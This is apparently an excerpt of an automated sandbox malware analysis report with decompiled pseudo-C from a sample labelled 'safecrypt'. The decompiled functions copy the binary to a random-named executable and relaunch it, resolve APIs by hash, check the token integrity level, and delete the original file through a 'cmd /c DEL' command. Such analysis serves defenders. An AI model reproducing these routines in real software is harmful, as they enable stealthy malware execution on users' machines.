                    • API ID: ProcessToken$AdjustChangeCloseCurrentFindNotificationOpenPrivileges
                    • String ID:
                    • API String ID: 980374797-0
                    • Opcode ID: 477b893e0344b1e623ce9d2356c0300d70f0d8e3bdc634cf0c179e451ed95918
                    • Instruction ID: 72eb90004274f00a1b8b9fa6230ee35f4695e634fdbf87a2faf54b7edfc93f15
                    • Opcode Fuzzy Hash: 477b893e0344b1e623ce9d2356c0300d70f0d8e3bdc634cf0c179e451ed95918
                    • Instruction Fuzzy Hash: D3015E70F0020CABDB04DFA4ED46BAEB7B8EF48704F90416DE609A7691DB7469408B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041FC40(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				long _v16;
                    				int _t25;
                    				int _t29;
                    				void* _t32;
                    				void* _t58;
                    
                    				_t58 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				if(_a4 != 0) {
                    					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
                    						_t25 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v16); // executed
                    						if(_t25 != 0 || GetLastError() == 0x7a) {
                    							_t58 = LocalAlloc(0x40, _v16);
                    							if(_t58 != 0) {
                    								_t29 = GetTokenInformation(_v12, 0x19, _t58, _v16,  &_v16); // executed
                    								if(_t29 != 0) {
                    									 *_a4 =  *(GetSidSubAuthority( *_t58, 0));
                    								} else {
                    									_v8 = GetLastError();
                    								}
                    							} else {
                    								_v8 = GetLastError();
                    							}
                    						} else {
                    							_v8 = GetLastError();
                    						}
                    					} else {
                    						_v8 = GetLastError();
                    					}
                    					_t32 = _v12;
                    					if(_t32 != 0) {
                    						CloseHandle(_t32);
                    						_v12 = 0;
                    					}
                    					if(_t58 != 0) {
                    						LocalFree(_t58);
                    						_v16 = 0;
                    					}
                    					if(_v8 == 0) {
                    						return 1;
                    					} else {
                    						SetLastError(_v8);
                    						return 0;
                    					}
                    				} else {
                    					SetLastError(0x57);
                    					return 0;
                    				}
                    			}










                    0x0041fc47
                    0x0041fc49
                    0x0041fc4c
                    0x0041fc4f
                    0x0041fc55
                    0x0041fc80
                    0x0041fca0
                    0x0041fcaa
                    0x0041fcc6
                    0x0041fcca
                    0x0041fce2
                    0x0041fce6
                    0x0041fcff
                    0x0041fce8
                    0x0041fcea
                    0x0041fcea
                    0x0041fccc
                    0x0041fcce
                    0x0041fcce
                    0x0041fcb3
                    0x0041fcb5
                    0x0041fcb5
                    0x0041fc82
                    0x0041fc88
                    0x0041fc88
                    0x0041fd02
                    0x0041fd09
                    0x0041fd0c
                    0x0041fd12
                    0x0041fd12
                    0x0041fd17
                    0x0041fd1a
                    0x0041fd20
                    0x0041fd20
                    0x0041fd27
                    0x0041fd43
                    0x0041fd29
                    0x0041fd2d
                    0x0041fd39
                    0x0041fd39
                    0x0041fc57
                    0x0041fc5d
                    0x0041fc69
                    0x0041fc69

                    APIs
                    • SetLastError.KERNEL32(00000057,74A33620,?,0041F655,?), ref: 0041FC5D
                    • GetCurrentProcess.KERNEL32(00000008,0041F655,00000000,74A33620,?,0041F655,?), ref: 0041FC71
                    • OpenProcessToken.ADVAPI32(00000000,?,0041F655,?), ref: 0041FC78
                    • GetLastError.KERNEL32(?,0041F655,?), ref: 0041FC82
                    • CloseHandle.KERNEL32(0041F655,00000000,?,0041F655,?), ref: 0041FD0C
                    • LocalFree.KERNEL32(00000000,00000000,?,0041F655,?), ref: 0041FD1A
                    • SetLastError.KERNEL32(?,?,0041F655,?), ref: 0041FD2D
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                    • String ID:
                    • API String ID: 1977215774-0
                    • Opcode ID: b0919ff8d7548b4962f53b4c7e30a841c1e8fa5c5395df5db3549337e1047a4b
                    • Instruction ID: aa7fa2dde19043127ddf63cab766f08cf42b03cddf29097cb24d50859069b9b3
                    • Opcode Fuzzy Hash: b0919ff8d7548b4962f53b4c7e30a841c1e8fa5c5395df5db3549337e1047a4b
                    • Instruction Fuzzy Hash: BC318475D00218EFDB10DFE9EC44AEEBBB8FF48751F108166E905E3210E63499869BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0041FD50(void* __ebx, void* __eflags) {
                    				signed int _v8;
                    				char _v28;
                    				char _v8218;
                    				short _v8220;
                    				struct _STARTUPINFOW _v8292;
                    				struct _PROCESS_INFORMATION _v8308;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t21;
                    				void* _t29;
                    				long _t30;
                    				int _t40;
                    				signed int _t63;
                    				void* _t64;
                    				void* _t66;
                    				void* _t67;
                    
                    				E0042DFB0(0x2070);
                    				_t21 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t21 ^ _t63;
                    				_v8220 = 0;
                    				E0042C770( &_v8218, 0, 0x1ffe);
                    				E004233B0( &_v28, 7); // executed
                    				_push(PathFindFileNameW(0x46a450));
                    				E00414320(0x1000,  &_v8220, L"%s\\%s", 0x46c450);
                    				_t66 = _t64 + 0x24;
                    				_t29 = CreateFileW( &_v8220, 0x80000000, 1, 0, 3, 0, 0); // executed
                    				_t61 = _t29;
                    				_t30 = GetLastError();
                    				_t59 = _t30; // executed
                    				FindCloseChangeNotification(_t29); // executed
                    				if(_t30 != 2) {
                    					__eflags = 0;
                    					return E004256D3(0, __ebx, _v8 ^ _t63, 0x1000, _t59, _t61);
                    				} else {
                    					_push( &_v28);
                    					E00414320(0x1000,  &_v8220, L"%s\\%s.exe", 0x46c450);
                    					_t67 = _t66 + 0x10;
                    					do {
                    						CopyFileW(0x46a450,  &_v8220, 0); // executed
                    						E0042C770( &_v8292, 0, 0x44);
                    						_t67 = _t67 + 0xc;
                    						_v8292.wShowWindow = 1;
                    						_v8292.dwFlags = 1;
                    						_v8292.cb = 0x44;
                    						_t40 = CreateProcessW(0,  &_v8220, 0, 0, 0, 0x20, 0, 0,  &_v8292,  &_v8308); // executed
                    						_t70 = _t40;
                    					} while (_t40 == 0);
                    					E0041FEC0(__ebx,  &_v8292, CreateProcessW, CopyFileW, _t70); // executed
                    					return E004256D3(1, __ebx, _v8 ^ _t63,  &_v8292, CreateProcessW, CopyFileW);
                    				}
                    			}



















                    0x0041fd58
                    0x0041fd5d
                    0x0041fd64
                    0x0041fd78
                    0x0041fd7f
                    0x0041fd8a
                    0x0041fd9d
                    0x0041fdb4
                    0x0041fdb9
                    0x0041fdd2
                    0x0041fdd8
                    0x0041fdda
                    0x0041fde1
                    0x0041fde3
                    0x0041fdec
                    0x0041fea8
                    0x0041feb3
                    0x0041fdf2
                    0x0041fdf5
                    0x0041fe0c
                    0x0041fe1d
                    0x0041fe20
                    0x0041fe2e
                    0x0041fe3b
                    0x0041fe40
                    0x0041fe60
                    0x0041fe67
                    0x0041fe78
                    0x0041fe82
                    0x0041fe84
                    0x0041fe84
                    0x0041fe88
                    0x0041fea1
                    0x0041fea1

                    APIs
                    • _memset.LIBCMT ref: 0041FD7F
                      • Part of subcall function 004233B0: GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 004233B0: _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 004233B0: Sleep.KERNELBASE(0000000F), ref: 004233F7
                    • PathFindFileNameW.SHLWAPI(0046A450,?,00000000,74A33620,?,0041F6CD), ref: 0041FD97
                      • Part of subcall function 00414320: __strftime_l.LIBCMT ref: 00414335
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDD2
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDDA
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDE3
                    • CopyFileW.KERNELBASE(0046A450,?,00000000,?,?,?,?,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FE2E
                    • _memset.LIBCMT ref: 0041FE3B
                    • CreateProcessW.KERNELBASE ref: 0041FE82
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateFind_memset$ChangeCloseCopyCountErrorLastNameNotificationPathProcessSleepTick__strftime_l_rand
                    • String ID: %s\%s$%s\%s.exe$D
                    • API String ID: 4011548120-1704063882
                    • Opcode ID: 8befb5b8738b6c3cc2603bb689a177b9316fdf1f574b9c562ee554d4cb4a630c
                    • Instruction ID: 959dde0843b5e7ff2405a1080fc9c4bc1e52f6f36fb5be7a3dbab0f1a9dc4b8d
                    • Opcode Fuzzy Hash: 8befb5b8738b6c3cc2603bb689a177b9316fdf1f574b9c562ee554d4cb4a630c
                    • Instruction Fuzzy Hash: B231E871B503186AE720DB60DC46FEE7379EB44704F50009AF608A61C2EAB46A95CBE9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420440() {
                    				void _v8;
                    				long _v12;
                    				short _v15;
                    				void _v16;
                    				void* _t8;
                    				void* _t28;
                    
                    				_v8 = 0;
                    				_t8 = CreateFileW(0x46a450, 0x80000000, 1, 0, 3, 0, 0); // executed
                    				_t28 = _t8;
                    				if(_t28 == 0xffffffff) {
                    					return 0;
                    				} else {
                    					SetFilePointer(_t28, 0x3c, 0, 0); // executed
                    					ReadFile(_t28,  &_v8, 2,  &_v12, 0); // executed
                    					SetFilePointer(_t28, _v8 + 0x58, 0, 0); // executed
                    					ReadFile(_t28,  &_v16, 4,  &_v12, 0); // executed
                    					FindCloseChangeNotification(_t28); // executed
                    					return _v15;
                    				}
                    			}









                    0x0042045b
                    0x00420462
                    0x00420468
                    0x0042046d
                    0x004204cb
                    0x0042046f
                    0x0042047e
                    0x00420493
                    0x004204a2
                    0x004204b1
                    0x004204b4
                    0x004204c4
                    0x004204c4

                    APIs
                    • CreateFileW.KERNELBASE(0046A450,80000000,00000001,00000000,00000003,00000000,00000000,74A33620), ref: 00420462
                    • SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,00000000), ref: 0042047E
                    • ReadFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00420493
                    • SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004204A2
                    • ReadFile.KERNELBASE(00000000,?,00000004,?,00000000), ref: 004204B1
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004204B4
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$PointerRead$ChangeCloseCreateFindNotification
                    • String ID:
                    • API String ID: 3963928282-0
                    • Opcode ID: ff335b16cc36cf834d5be52a9d2c68a6e9c5b17ec954712f6bf92bb85020825f
                    • Instruction ID: 24e8d29560d16b02e84b66a89abc5ee6543fbba335c3e13278970d64c51ef392
                    • Opcode Fuzzy Hash: ff335b16cc36cf834d5be52a9d2c68a6e9c5b17ec954712f6bf92bb85020825f
                    • Instruction Fuzzy Hash: 11019236681618BAF610A7949C46FEEB7ACDB48B11F100156FB04B60D0E7F42A45C7E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042BC41() {
                    				WCHAR* _t2;
                    				void* _t4;
                    				void* _t15;
                    				WCHAR* _t17;
                    
                    				_t2 = GetEnvironmentStringsW();
                    				_t17 = _t2;
                    				if(_t17 != 0) {
                    					if( *_t17 != 0) {
                    						goto L3;
                    						do {
                    							do {
                    								L3:
                    								_t2 =  &(_t2[1]);
                    							} while ( *_t2 != 0);
                    							_t2 =  &(_t2[1]);
                    						} while ( *_t2 != 0);
                    					}
                    					_t1 = _t2 - _t17 + 2; // -2
                    					_t10 = _t1;
                    					_t4 = E0042C80D(_t1); // executed
                    					_t15 = _t4;
                    					if(_t15 != 0) {
                    						E0042E030(_t15, _t17, _t10);
                    					}
                    					FreeEnvironmentStringsW(_t17);
                    					return _t15;
                    				} else {
                    					return 0;
                    				}
                    			}







                    0x0042bc44
                    0x0042bc4a
                    0x0042bc50
                    0x0042bc59
                    0x00000000
                    0x0042bc5b
                    0x0042bc5b
                    0x0042bc5b
                    0x0042bc5b
                    0x0042bc5e
                    0x0042bc63
                    0x0042bc66
                    0x0042bc5b
                    0x0042bc6e
                    0x0042bc6e
                    0x0042bc73
                    0x0042bc78
                    0x0042bc7d
                    0x0042bc8f
                    0x0042bc94
                    0x0042bc80
                    0x0042bc8b
                    0x0042bc52
                    0x0042bc55
                    0x0042bc55

                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,00426837), ref: 0042BC44
                    • __malloc_crt.LIBCMT ref: 0042BC73
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042BC80
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: 555d97773c19d80208110b5c039258f79e7c8eb5c7d493d4c0c8b22d6731b823
                    • Instruction ID: a6738784124e55191c45c375dc9ebad1cc1e94c158c890f0107cd78376825cd3
                    • Opcode Fuzzy Hash: 555d97773c19d80208110b5c039258f79e7c8eb5c7d493d4c0c8b22d6731b823
                    • Instruction Fuzzy Hash: 89F0E9777010305A8F217B36BC8589B1728CAD5364346442FF441C3214FF288D4183ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 52%
                    			E0041FEC0(intOrPtr __ebx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                    				signed int _v8;
                    				short _v8200;
                    				char _v16392;
                    				signed int _t16;
                    				intOrPtr* _t18;
                    				long _t23;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				signed int _t48;
                    
                    				_t47 = __esi;
                    				_t46 = __edi;
                    				_t44 = __edx;
                    				_t34 = __ebx;
                    				E0042DFB0(0x4004);
                    				_t16 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t16 ^ _t48;
                    				_t18 = E00412FC0(__edx, 0, 1, 0x774393fe);
                    				_push(0x1000);
                    				_push( &_v8200);
                    				_push(0);
                    				if( *_t18() == 0) {
                    					L5:
                    					return E004256D3(0, _t34, _v8 ^ _t48, _t44, _t46, _t47);
                    				} else {
                    					_t44 =  &_v8200;
                    					_t23 = GetShortPathNameW( &_v8200,  &_v8200, 0x1000); // executed
                    					if(_t23 == 0) {
                    						goto L5;
                    					} else {
                    						E00425E0C( &_v16392, 0x1000, L"/c ", 0x1000);
                    						E00425AA2( &_v16392, 0x1000, L"DE");
                    						E00425AA2( &_v16392, 0x1000, L"L ");
                    						_t44 =  &_v16392;
                    						E00425AA2( &_v16392, 0x1000,  &_v8200);
                    						_t29 = E00412FC0( &_v16392, 0, 1, 0x9802ef26);
                    						_push(0x1000);
                    						_push( &_v8200);
                    						_push(L"ComSpec");
                    						if( *_t29() == 0) {
                    							goto L5;
                    						} else {
                    							_t44 =  &_v8200;
                    							_t31 = E00420860( &_v16392,  &_v8200); // executed
                    							if(_t31 <= 0x20) {
                    								goto L5;
                    							} else {
                    								return E004256D3(1, __ebx, _v8 ^ _t48,  &_v8200, __edi, __esi);
                    							}
                    						}
                    					}
                    				}
                    			}












                    0x0041fec0
                    0x0041fec0
                    0x0041fec0
                    0x0041fec0
                    0x0041fec8
                    0x0041fecd
                    0x0041fed4
                    0x0041fee0
                    0x0041fee8
                    0x0041fef3
                    0x0041fef4
                    0x0041fefa
                    0x0041ffd1
                    0x0041ffe0
                    0x0041ff00
                    0x0041ff05
                    0x0041ff0f
                    0x0041ff17
                    0x00000000
                    0x0041ff1d
                    0x0041ff33
                    0x0041ff49
                    0x0041ff5f
                    0x0041ff6b
                    0x0041ff77
                    0x0041ff85
                    0x0041ff8d
                    0x0041ff98
                    0x0041ff99
                    0x0041ffa2
                    0x00000000
                    0x0041ffa4
                    0x0041ffa4
                    0x0041ffb1
                    0x0041ffbc
                    0x00000000
                    0x0041ffbe
                    0x0041ffd0
                    0x0041ffd0
                    0x0041ffbc
                    0x0041ffa2
                    0x0041ff17

                    APIs
                    • GetShortPathNameW.KERNELBASE ref: 0041FF0F
                      • Part of subcall function 00420860: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,747DFE60,00000000), ref: 00420959
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteNamePathShellShort
                    • String ID: /c $ComSpec
                    • API String ID: 1456131810-392535306
                    • Opcode ID: 8304254ec000344d77d1a01cd53706af39abbcd87ad3fbb620b4997490f2518c
                    • Instruction ID: 442ed99b0e111f2b40a0611dfd883a82b056479ad36b6e664011fceea2867897
                    • Opcode Fuzzy Hash: 8304254ec000344d77d1a01cd53706af39abbcd87ad3fbb620b4997490f2518c
                    • Instruction Fuzzy Hash: 2721CB71B4031866EB24D7619D83FEEB3748F48744F50049EB709BA1C1EEF8EA84865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E004233B0(intOrPtr _a4, signed int _a8) {
                    				intOrPtr _t15;
                    				signed int _t18;
                    				signed int _t22;
                    				signed int _t28;
                    				signed int _t30;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t22 = _a8;
                    				_t28 = 0;
                    				_t34 = _t22;
                    				if(_t22 <= 0) {
                    					_t15 = _a4;
                    					__eflags = 0;
                    					 *((short*)(_t15 + _t22 * 2)) = 0;
                    					return _t15;
                    				} else {
                    					do {
                    						E0042671C(GetTickCount());
                    						_t33 = _t32 + 4;
                    						do {
                    							_t18 = E0042672E(_t34);
                    							asm("cdq");
                    							_t30 = _t18 % 0x7a;
                    						} while (_t30 < 0x61);
                    						E0042671C(1);
                    						_t32 = _t33 + 4;
                    						 *(_a4 + _t28 * 2) = _t30;
                    						Sleep(0xf); // executed
                    						_t28 = _t28 + 1;
                    					} while (_t28 < _t22);
                    					 *((short*)(_a4 + _t22 * 2)) = 0;
                    					return 0;
                    				}
                    			}










                    0x004233b4
                    0x004233b8
                    0x004233ba
                    0x004233bc
                    0x00423410
                    0x00423413
                    0x00423416
                    0x0042341c
                    0x004233be
                    0x004233c0
                    0x004233c7
                    0x004233cc
                    0x004233d0
                    0x004233d0
                    0x004233d5
                    0x004233dd
                    0x004233df
                    0x004233e6
                    0x004233ee
                    0x004233f3
                    0x004233f7
                    0x004233fd
                    0x004233fe
                    0x00423409
                    0x0042340f
                    0x0042340f

                    APIs
                    • GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 0042671C: __getptd.LIBCMT ref: 00426721
                    • _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 0042672E: __getptd.LIBCMT ref: 0042672E
                    • Sleep.KERNELBASE(0000000F), ref: 004233F7
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getptd$CountSleepTick_rand
                    • String ID:
                    • API String ID: 1716435427-0
                    • Opcode ID: af772c5cec22a5610f4258c57a2651eaba347f65a4ceb22c1b9fe1d94790e234
                    • Instruction ID: 78c04d1eafe4dc66247dda726c4a7a38e39494e4419d44e57d0758d24792d6e0
                    • Opcode Fuzzy Hash: af772c5cec22a5610f4258c57a2651eaba347f65a4ceb22c1b9fe1d94790e234
                    • Instruction Fuzzy Hash: DAF02876704114ABD300AF6AFC81A5E7369EFC4328F40943BF50DC7221CD7A955143AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004285EA(int _a4) {
                    
                    				E004285BF(_a4);
                    				ExitProcess(_a4);
                    			}



                    0x004285f2
                    0x004285fb

                    APIs
                    • ___crtCorExitProcess.LIBCMT ref: 004285F2
                      • Part of subcall function 004285BF: GetModuleHandleW.KERNEL32(mscoree.dll,?,004285F7,00000000,?,00425921,000000FF,0000001E,00000001,00000000,00000000,?,0042C81E,00000000,00000001,00000000), ref: 004285C9
                      • Part of subcall function 004285BF: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004285D9
                    • ExitProcess.KERNEL32 ref: 004285FB
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                    • String ID:
                    • API String ID: 2427264223-0
                    • Opcode ID: 0fbedbcc82609b8c1b0f974318193ec2f11ac91005322a8097b35192de1fcb5f
                    • Instruction ID: ac6cba6f1f308a56e8ebcb6e59c77a59a577169e453ef347d71d5838df0d33b6
                    • Opcode Fuzzy Hash: 0fbedbcc82609b8c1b0f974318193ec2f11ac91005322a8097b35192de1fcb5f
                    • Instruction Fuzzy Hash: 65B09B31000108BBCF012F12DC0995D3F15DB813507545025F91805135DF719D9195C4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 52%
                    			E00420860(short* __ecx, short* _a4) {
                    				signed int _v8;
                    				char _v136;
                    				int _v140;
                    				int _v144;
                    				short* _v148;
                    				short* _v152;
                    				void* _v156;
                    				void* _v160;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t25;
                    				void* _t30;
                    				intOrPtr* _t32;
                    				intOrPtr* _t33;
                    				intOrPtr _t35;
                    				int _t37;
                    				intOrPtr _t46;
                    				char* _t50;
                    				signed int _t52;
                    				void* _t53;
                    
                    				_t25 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t25 ^ _t52;
                    				_v152 = _a4;
                    				_t28 = 0;
                    				_v148 = __ecx;
                    				_t50 = 0x439dbc;
                    				_t37 = 0;
                    				_v144 = 0;
                    				_v160 = 0x439dbc;
                    				_v140 = 0;
                    				_t43 = 0xf2;
                    				while( *((intOrPtr*)(_t37 + 0x439dbc)) != _t43) {
                    					_t37 = _t37 + 1;
                    					if(_t37 < 0x80) {
                    						continue;
                    					}
                    					_v140 = _t37;
                    					L7:
                    					_t32 = E00412FC0(_t43, 0, 1, 0xa48d6762);
                    					_t53 = _t53 + 0xc;
                    					_push(_t50);
                    					if( *_t32() == 0) {
                    						_t33 = E00412FC0(_t43, _t28, 1, 0xc8ac8026);
                    						_t53 = _t53 + 0xc;
                    						_t28 =  *_t33(_t50);
                    					}
                    					L9:
                    					E00412EE0(_t28, 0x570bc88f);
                    					_t30 = ShellExecuteW(0, 0, _v152, _v148, 0, 0); // executed
                    					_pop(_t46);
                    					return E004256D3(_t30, _t35, _v8 ^ _t52, _v152, _t46, _t50);
                    				}
                    				_t43 =  &_v136;
                    				_v140 = _t37;
                    				_v156 =  &_v136;
                    				if(_t37 > 0) {
                    					asm("pushad");
                    					memcpy(_v156, _v160, _v140);
                    					_t53 = _t53 + 0xc;
                    					asm("popad");
                    					_t28 = _v144;
                    					_t37 = _v140;
                    				}
                    				 *((char*)(_t52 + _t37 - 0x84)) = 0;
                    				_t50 =  &_v136;
                    				if(_v136 == 0) {
                    					goto L9;
                    				} else {
                    					goto L7;
                    				}
                    			}
























                    0x00420869
                    0x00420870
                    0x00420878
                    0x0042087e
                    0x00420880
                    0x00420886
                    0x0042088b
                    0x0042088e
                    0x00420894
                    0x0042089a
                    0x004208a0
                    0x004208a2
                    0x004208aa
                    0x004208b1
                    0x00000000
                    0x00000000
                    0x004208b3
                    0x0042090a
                    0x00420913
                    0x00420918
                    0x0042091b
                    0x00420920
                    0x0042092a
                    0x0042092f
                    0x00420933
                    0x00420933
                    0x00420935
                    0x0042093b
                    0x00420959
                    0x0042095e
                    0x0042096b
                    0x0042096b
                    0x004208bb
                    0x004208c1
                    0x004208c7
                    0x004208cf
                    0x004208d1
                    0x004208e4
                    0x004208e4
                    0x004208e6
                    0x004208e7
                    0x004208ed
                    0x004208ed
                    0x004208f3
                    0x00420902
                    0x00420908
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,747DFE60,00000000), ref: 00420959
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID:
                    • API String ID: 587946157-0
                    • Opcode ID: e23c68385ce3c31196e8b4de889bcd8ef0b4662266f7b8423225729cb3af12c7
                    • Instruction ID: 8f484976fbf97d9fcd588f86323662953d4d48f0b33ea12294a00fdecd167eff
                    • Opcode Fuzzy Hash: e23c68385ce3c31196e8b4de889bcd8ef0b4662266f7b8423225729cb3af12c7
                    • Instruction Fuzzy Hash: 27218270E00228ABEF64DB249D42B9AB7B4BF45304F5080EEA54DF7342DAB55E858F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0042E3E0(signed int _a4, signed int _a8, long _a12) {
                    				void* _t10;
                    				long _t11;
                    				long _t12;
                    				signed int _t13;
                    				signed int _t17;
                    				long _t19;
                    				long _t24;
                    
                    				_t17 = _a4;
                    				if(_t17 == 0) {
                    					L3:
                    					_t24 = _t17 * _a8;
                    					__eflags = _t24;
                    					if(_t24 == 0) {
                    						_t24 = _t24 + 1;
                    						__eflags = _t24;
                    					}
                    					goto L5;
                    					L6:
                    					_t10 = RtlAllocateHeap( *0x43ea98, 8, _t24); // executed
                    					__eflags = 0;
                    					if(0 == 0) {
                    						goto L7;
                    					}
                    					L14:
                    					return _t10;
                    					goto L15;
                    					L7:
                    					__eflags =  *0x43f0fc;
                    					if( *0x43f0fc == 0) {
                    						_t19 = _a12;
                    						__eflags = _t19;
                    						if(_t19 != 0) {
                    							 *_t19 = 0xc;
                    						}
                    					} else {
                    						_t11 = E00428AC7(_t10, _t24);
                    						__eflags = _t11;
                    						if(_t11 != 0) {
                    							L5:
                    							_t10 = 0;
                    							__eflags = _t24 - 0xffffffe0;
                    							if(_t24 > 0xffffffe0) {
                    								goto L7;
                    							} else {
                    								goto L6;
                    							}
                    						} else {
                    							_t12 = _a12;
                    							__eflags = _t12;
                    							if(_t12 != 0) {
                    								 *_t12 = 0xc;
                    							}
                    							_t10 = 0;
                    						}
                    					}
                    					goto L14;
                    				} else {
                    					_t13 = 0xffffffe0;
                    					_t27 = _t13 / _t17 - _a8;
                    					if(_t13 / _t17 >= _a8) {
                    						goto L3;
                    					} else {
                    						 *((intOrPtr*)(E00426D35(_t27))) = 0xc;
                    						return 0;
                    					}
                    				}
                    				L15:
                    			}










                    0x0042e3e5
                    0x0042e3ea
                    0x0042e407
                    0x0042e40c
                    0x0042e40e
                    0x0042e410
                    0x0042e412
                    0x0042e412
                    0x0042e412
                    0x00000000
                    0x0042e41a
                    0x0042e423
                    0x0042e429
                    0x0042e42b
                    0x00000000
                    0x00000000
                    0x0042e45f
                    0x0042e461
                    0x00000000
                    0x0042e42d
                    0x0042e42d
                    0x0042e434
                    0x0042e452
                    0x0042e455
                    0x0042e457
                    0x0042e459
                    0x0042e459
                    0x0042e436
                    0x0042e437
                    0x0042e43d
                    0x0042e43f
                    0x0042e413
                    0x0042e413
                    0x0042e415
                    0x0042e418
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0042e441
                    0x0042e441
                    0x0042e444
                    0x0042e446
                    0x0042e448
                    0x0042e448
                    0x0042e44e
                    0x0042e44e
                    0x0042e43f
                    0x00000000
                    0x0042e3ec
                    0x0042e3f0
                    0x0042e3f3
                    0x0042e3f6
                    0x00000000
                    0x0042e3f8
                    0x0042e3fd
                    0x0042e406
                    0x0042e406
                    0x0042e3f6
                    0x00000000

                    APIs
